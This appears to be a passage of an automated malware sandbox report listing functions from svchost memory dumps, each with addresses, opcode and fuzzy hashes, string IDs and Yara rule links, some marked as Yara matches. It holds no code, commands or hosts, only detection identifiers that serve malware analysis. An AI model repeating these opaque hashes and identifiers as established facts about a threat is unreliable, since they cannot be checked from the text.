                                                                    • API String ID: 0-1553575800
                                                                    • Opcode ID: 7f21518733ee6909c63d1a4d18608fcf96e4104911dfb937ad4e7132d9705957
                                                                    • Instruction ID: ddafb09f9440d5c9aa1b71b613b8dfba69842970aeb9c2836bcb70656fb0c609
                                                                    • Opcode Fuzzy Hash: 7f21518733ee6909c63d1a4d18608fcf96e4104911dfb937ad4e7132d9705957
                                                                    • Instruction Fuzzy Hash: 83512872B0003E47CB2CC82D9C913BE7643D7D4215F58923BED9ACF7D5E6A89D424295
                                                                    Function 0241228F Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: gfff
                                                                    • API String ID: 0-1553575800
                                                                    • Opcode ID: 1a15f33fb89d69d6a8c0973e647337499d5693480e36d9fb7d1cd785751a07c1
                                                                    • Instruction ID: 23d5d67b31dc312747ad6d77c4dac94f9597df7e7a8649be62b45c531018e77d
                                                                    • Opcode Fuzzy Hash: 1a15f33fb89d69d6a8c0973e647337499d5693480e36d9fb7d1cd785751a07c1
                                                                    • Instruction Fuzzy Hash: 1E41E272B0002A47DB2CC82DDC913BE7643E7D4205F59923BED5ACF7D5EAA89D428690
                                                                    Function 02ED4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .mui
                                                                    • API String ID: 0-1199573805
                                                                    • Opcode ID: 5b99ec8e0a27951cf3038c15e0487cfab3b1fe978a06414cc21ff21304141b37
                                                                    • Instruction ID: 7d5bfbc522b004d810f962d71f5b74cddbc6aa367f5f81588154f5b2cb3540ba
                                                                    • Opcode Fuzzy Hash: 5b99ec8e0a27951cf3038c15e0487cfab3b1fe978a06414cc21ff21304141b37
                                                                    • Instruction Fuzzy Hash: 0D51B372D8022A9BDF15DF99D844AAEB7B5BF24704F059169F911BB290D7348802CFA0
                                                                    Function 02E4E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: EXT-
                                                                    • API String ID: 0-1948896318
                                                                    • Opcode ID: 624f51c68970c008a27547166dbcbe91ea47e443d755be8cdf77699ddb873eeb
                                                                    • Instruction ID: c229be208258868ff928451f8ca3c7a10c730c8624d113167d94c4a319c9728c
                                                                    • Opcode Fuzzy Hash: 624f51c68970c008a27547166dbcbe91ea47e443d755be8cdf77699ddb873eeb
                                                                    • Instruction Fuzzy Hash: 7A41A1715883019BD710DB65E884FABB7D9BF88718F48A92DFA84D7180EB74D904CB92
                                                                    Function 02EAC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    • Opcode ID: dd158a2e5a9e313588bfc7769a5771dfeb1bf72fb1024ac2cd0a1474dfe0bb07
                                                                    • Instruction ID: 44598ad7fe2ae3109253231c818a010a362f4df54921f8b0b5ebc308710ed00f
                                                                    • Opcode Fuzzy Hash: dd158a2e5a9e313588bfc7769a5771dfeb1bf72fb1024ac2cd0a1474dfe0bb07
                                                                    • Instruction Fuzzy Hash: 884146B1D4012CAADB21DA50CC94FDEB77DAB45718F1095E6AB08AB140DB70AE898F94
                                                                    Function 02EC6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    • Opcode ID: 9aacb2ee1ea5f9e7a58682beed63a5fac96e7a3339320285d8d7e7af4fefdf62
                                                                    • Instruction ID: 50fa069c5993ef081c501c536172f66a528b52994d07488ce8b1f5042a2dfaf1
                                                                    • Opcode Fuzzy Hash: 9aacb2ee1ea5f9e7a58682beed63a5fac96e7a3339320285d8d7e7af4fefdf62
                                                                    • Instruction Fuzzy Hash: CF310331A806589ADB21DBA8C950FEFB7BDDF8570CF60906CE941AB281CB75D806CB50
                                                                    Function 02EACA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    • Opcode ID: f6438a8c7ebcd8b39a294ac5efbed8f28987d19f16df23874b2fef342ed92dbe
                                                                    • Instruction ID: 0f2adfcddc76a2597627abe19f0f601ac8797befbe282c9b691d328518d3ecb6
                                                                    • Opcode Fuzzy Hash: f6438a8c7ebcd8b39a294ac5efbed8f28987d19f16df23874b2fef342ed92dbe
                                                                    • Instruction Fuzzy Hash: 92313536981519AFDB15DB58C871EBFB774EB80714F21E46AA906AB250D731AE00CBE0
                                                                    Function 02ECAEB0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02ECAF2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                    • API String ID: 0-1911121157
                                                                    • Opcode ID: 98a45dbad90a3240968d5f457965c2d8a6af7bb25fda4fbdbb61a876a557a603
                                                                    • Instruction ID: 3ca2c743c9e7e231e199ad48f194e609dc27d6c9aa4eddcb1c1abdf469b66651
                                                                    • Opcode Fuzzy Hash: 98a45dbad90a3240968d5f457965c2d8a6af7bb25fda4fbdbb61a876a557a603
                                                                    • Instruction Fuzzy Hash: 233134B2A80648ABD710DF54CD01F5AF7B9FB44B14F21C628F90597780D734A801CB90
                                                                    Function 02EB892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 02EB895E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                    • API String ID: 0-702105204
                                                                    • Opcode ID: 097a13fec44e3cc7ced549b353c1c34b88119b20fd8222642a3088aa34e12c24
                                                                    • Instruction ID: 25ca1bc6d05547be55ce79452fe9d340f2b30e4e331b5ec4544dc14879c1d536
                                                                    • Opcode Fuzzy Hash: 097a13fec44e3cc7ced549b353c1c34b88119b20fd8222642a3088aa34e12c24
                                                                    • Instruction Fuzzy Hash: 3A01FC316C02149BEB279A51888CBE77769EF8A798F047418F64616691CB30AC44CA92
                                                                    Function 02E6E8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 473ecdca99bde9f8d0e2a0be12aa09694040a0546d8b570923f57db62ceb433e
                                                                    • Instruction ID: 20027a08f06db5f250eabbc3dd81db7ab6dfc49492804d2b63bf8f08aec0c311
                                                                    • Opcode Fuzzy Hash: 473ecdca99bde9f8d0e2a0be12aa09694040a0546d8b570923f57db62ceb433e
                                                                    • Instruction Fuzzy Hash: 7F823472F102188BCB58CFADD8916DDB7F2EF8C314B19812DE416EB345DA34AC968B45
                                                                    Function 02E7516C Relevance: .8, Instructions: 785COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c759ef133fb00094d407513661432d9f17fcb22e99b7cd5f6537ce8b59391a77
                                                                    • Instruction ID: ed1ba23308bbe0608f878f5a4adaa6954102908348ff5db48dcd1a74be24c0c5
                                                                    • Opcode Fuzzy Hash: c759ef133fb00094d407513661432d9f17fcb22e99b7cd5f6537ce8b59391a77
                                                                    • Instruction Fuzzy Hash: 7562807288468AAFCF14CF48D4905EEBB72FE55318B85E65CCC9A27604D331BA58CBD1
                                                                    Function 02ED2000 Relevance: .8, Instructions: 757COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 59076907f0c879e8eabba85b839557fb40fe229f1964e86f5ad73195193f530c
                                                                    • Instruction ID: f018deb80dc07cf2496e306405427890f195be598255cc3dfc88bb9abf5e816f
                                                                    • Opcode Fuzzy Hash: 59076907f0c879e8eabba85b839557fb40fe229f1964e86f5ad73195193f530c
                                                                    • Instruction Fuzzy Hash: 6742E2366883418FD725CF64C890B6BB7E6BF88308F44A92DFE8697251D731D846CB52
                                                                    Function 02E8739A Relevance: .7, Instructions: 705COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 60c67e39c73d57ee2a1ad8038bd8a2f8bd619bbc1b961f50f77149ef0d51d740
                                                                    • Instruction ID: c97eb19b84c1f8643ec29a4840967d57f8a1113301c1f8ff31fed9af15a650a2
                                                                    • Opcode Fuzzy Hash: 60c67e39c73d57ee2a1ad8038bd8a2f8bd619bbc1b961f50f77149ef0d51d740
                                                                    • Instruction Fuzzy Hash: C342B079A406168FDB18DF59C4906BEF7F2FF88318B24D569E59AAB340D730E841CB90
                                                                    Function 02E85AA0 Relevance: .7, Instructions: 652COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                    • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                    • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                    • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                    Function 02E5B2C0 Relevance: .6, Instructions: 629COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4deb98e6f338508c33e4d1ad0dfb3f7dc0ca8ab67dabbba4c8547a7acf2fb155
                                                                    • Instruction ID: 02b7bbd084f48e5fd6fbb5a28954a553fc19647fcf37166f268ae4df066753cd
                                                                    • Opcode Fuzzy Hash: 4deb98e6f338508c33e4d1ad0dfb3f7dc0ca8ab67dabbba4c8547a7acf2fb155
                                                                    • Instruction Fuzzy Hash: E532A071E50229DBCF24CF68C894BAEBBB1FF54718F18902DE805AB385E7759901CB90
                                                                    Function 02EC8158 Relevance: .6, Instructions: 617COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 53eb4eae6877cc94841c8ff7d43fdb5a49a9d57df2368bef2e14777cb4d1f705
                                                                    • Instruction ID: bacd72af559cb925db7df1220d159b1ed18515ac27dad7854dfc3c74eb22cf5f
                                                                    • Opcode Fuzzy Hash: 53eb4eae6877cc94841c8ff7d43fdb5a49a9d57df2368bef2e14777cb4d1f705
                                                                    • Instruction Fuzzy Hash: CE425A71A402198FDB25CFA9CA81BADB7F6BF48304F24D09DE949EB241D7349981CF60
                                                                    Function 02E42840 Relevance: .6, Instructions: 605COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 362f4da23323490435aed9553245122d343e38336f2df28b634b4e9f5d14e046
                                                                    • Instruction ID: ac813985e12ff92c00ab97b79013e207108b9d015191d58d4561af98eb99ba63
                                                                    • Opcode Fuzzy Hash: 362f4da23323490435aed9553245122d343e38336f2df28b634b4e9f5d14e046
                                                                    • Instruction Fuzzy Hash: A632BE70A407558BDF24CF69C8447BEBBFABF85308F14951BE9869B284DB35A842CF50
                                                                    Function 02EDA118 Relevance: .6, Instructions: 591COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61f3adcc66d3aaa9b7766f46e0a47f01953f48d2a81ec601a952af599b8867f3
                                                                    • Instruction ID: 6ccd7ddfbf0dff43ad7f16cc07f866886f5bcbfffd2856445f1965a33519e053
                                                                    • Opcode Fuzzy Hash: 61f3adcc66d3aaa9b7766f46e0a47f01953f48d2a81ec601a952af599b8867f3
                                                                    • Instruction Fuzzy Hash: 0D22BE742846518BDB24CF29C0943B6B7F1AF45308F18E4AAE8968F385E735E653CB60
                                                                    Function 02EF16CC Relevance: .6, Instructions: 571COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dd1832a3eba3a322117c8348295e16e8a903635f3a330328f95915a2b8bdcdb4
                                                                    • Instruction ID: 6c7c0a369311ef4252f9c408a6b34a667d0a2f44396ce4274d05844f559f70d7
                                                                    • Opcode Fuzzy Hash: dd1832a3eba3a322117c8348295e16e8a903635f3a330328f95915a2b8bdcdb4
                                                                    • Instruction Fuzzy Hash: 7A22B235A4021ACFCB59CF59C490ABAB3B2BF89318B24D56DDA59DF344DB30E941CB90
                                                                    Function 02E5FB80 Relevance: .6, Instructions: 559COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 66f108542d7b3e0bc1eaa2a7f84cc533b2d89d40de46eb8a58e9127f5f6de540
                                                                    • Instruction ID: 15bbbd0130624cd8a524cabc1649873595677056b78e8ff08fce2047e3149333
                                                                    • Opcode Fuzzy Hash: 66f108542d7b3e0bc1eaa2a7f84cc533b2d89d40de46eb8a58e9127f5f6de540
                                                                    • Instruction Fuzzy Hash: 6722D270980209DFDB14DFA4C8A0BAEB7B5FF84314F14D5A9E9159B241EB34EA45CF90
                                                                    Function 02E58DBF Relevance: .6, Instructions: 554COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4a42712267551cd8ea7895309741603623b13e282c07cdc5ab14e5442f20cdbf
                                                                    • Instruction ID: 87fa5f501440dd716ff974a5cd4bcb215d64b86668175847e97e6e43e8f557ac
                                                                    • Opcode Fuzzy Hash: 4a42712267551cd8ea7895309741603623b13e282c07cdc5ab14e5442f20cdbf
                                                                    • Instruction Fuzzy Hash: 8C223F70E4016ADBCF19DF95C880ABEFBF6BF48309B54D45AE8459B241E734D981CBA0
                                                                    Function 02E36A50 Relevance: .5, Instructions: 548COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 489f149c689327e1be1c1389a946c2b24d4c3de27f56bbebff1412a82e1aafd9
                                                                    • Instruction ID: 257bec22a5230d7df9d09acc50a5544dd2bc3c5cf817627becb2c33bbb0149c0
                                                                    • Opcode Fuzzy Hash: 489f149c689327e1be1c1389a946c2b24d4c3de27f56bbebff1412a82e1aafd9
                                                                    • Instruction Fuzzy Hash: 13329A71A40205DFCB25CF69C484BAAB7F6FF48308F24956AE95AAB391D730E841CF54
                                                                    Function 02EF2446 Relevance: .5, Instructions: 485COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7a4566ddd39bc0b25924e8dc62cc0d81ae6ea3e82be151e6b11de997440c876b
                                                                    • Instruction ID: 5dab0fac2947a2788fba0a88c6b16f03a49fb1c1a3bb22e201c74aeb24a0d5be
                                                                    • Opcode Fuzzy Hash: 7a4566ddd39bc0b25924e8dc62cc0d81ae6ea3e82be151e6b11de997440c876b
                                                                    • Instruction Fuzzy Hash: 890213346406518BDBA4CF2AC4503B5BBF1AF85308B19D19AEFD6CF281E734E942DB61
                                                                    Function 02F0B16B Relevance: .4, Instructions: 450COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a566137c0a9cf9ab3228a50fc40f5a0df04157ee4ee74ccb3e26c961bec7d88
                                                                    • Instruction ID: 96235ea56970f75634936cec22b460d47d5fc4326422a0520a504912506ed0d3
                                                                    • Opcode Fuzzy Hash: 5a566137c0a9cf9ab3228a50fc40f5a0df04157ee4ee74ccb3e26c961bec7d88
                                                                    • Instruction Fuzzy Hash: 09F10672E002158BCB18CFA9C9E067EFBF6AF98244719416DD956DB3C0E734EA01DB50
                                                                    Function 02420113 Relevance: .4, Instructions: 435COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                    • Instruction ID: d627dc19ea0efe8213e62667c307775d864a4c81079d9d4654c1620b4cf6821f
                                                                    • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                    • Instruction Fuzzy Hash: D6026F73E547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                                                    Function 02F0A9A6 Relevance: .4, Instructions: 425COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ea1a6bd13f5f1bd2e758c04844347715796305cd19d07dd6aab8cfb6c78998c0
                                                                    • Instruction ID: e04d1d5052cff9e43c31b04d548232703cb3d4b996bf60b40fb666e6f8048850
                                                                    • Opcode Fuzzy Hash: ea1a6bd13f5f1bd2e758c04844347715796305cd19d07dd6aab8cfb6c78998c0
                                                                    • Instruction Fuzzy Hash: 40F1C673E006269BCB18CE69C9E05BDFBF5AF4424071A4269DA56EB3C0D734EE41DB90
                                                                    Function 02E54A35 Relevance: .4, Instructions: 423COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                    • Instruction ID: 479d956d600603eec5273572212227a9d299b7e21deb596993f3a77051e81b31
                                                                    • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                    • Instruction Fuzzy Hash: B0F18070E506299BDF19CF99D590BEEB7B6BF48708F04D169ED05AB280E734D881CB60
                                                                    Function 02EE2F30 Relevance: .4, Instructions: 412COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0650380ace660b791aa423620f50e59812f2bb1c7f9d085a9d1fee4caa8c655a
                                                                    • Instruction ID: 8f332270e4060e435e1be22276be5667a18135a49e174a6141493d65a822c106
                                                                    • Opcode Fuzzy Hash: 0650380ace660b791aa423620f50e59812f2bb1c7f9d085a9d1fee4caa8c655a
                                                                    • Instruction Fuzzy Hash: 6EE1E171E802859ADF24CFA8D4407FEBBF1AF48318F14D49EE897AB280D7359945CB50
                                                                    Function 02EC892B Relevance: .4, Instructions: 386COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d139b11b43348eb88390e41957973b8335ae858a007be1887905d752c7663165
                                                                    • Instruction ID: 5d8e9eba2a246853df1f3f1e441036a163ea5dc27f1db28142140bbdfeeac355
                                                                    • Opcode Fuzzy Hash: d139b11b43348eb88390e41957973b8335ae858a007be1887905d752c7663165
                                                                    • Instruction Fuzzy Hash: 85D10471A406099BDF1ACF98CA41BFEB7F1AF88308F28D16DD855A7241D735E906CB60
                                                                    Function 02E365D0 Relevance: .4, Instructions: 383COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9792baa7f0e404fd558162a127690f0de1f9aa737396aff1c1fd043d7ac3343d
                                                                    • Instruction ID: 3641472c1f050deac8f0905fd9c67f053c68dc0d84c5ee5bd71e08ee70dd0de9
                                                                    • Opcode Fuzzy Hash: 9792baa7f0e404fd558162a127690f0de1f9aa737396aff1c1fd043d7ac3343d
                                                                    • Instruction Fuzzy Hash: 56E1AA71648342DFC715CF28C084A6ABBE5FF89308F059A6DF8998B351DB31E905CB96
                                                                    Function 02E28397 Relevance: .4, Instructions: 380COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aaa6d13b114e38efec332e34ca96748aaf3afe43cde111074886b4d68f24e6a8
                                                                    • Instruction ID: c11535d45a24b08f6612a61726e09644556a1c7e998b1f5e7c8c6531a3d3d229
                                                                    • Opcode Fuzzy Hash: aaa6d13b114e38efec332e34ca96748aaf3afe43cde111074886b4d68f24e6a8
                                                                    • Instruction Fuzzy Hash: 22D1B871A806269BDB14DF64C890BBA73A6BF4430CF04D52DF95BDB280E734D949CB60
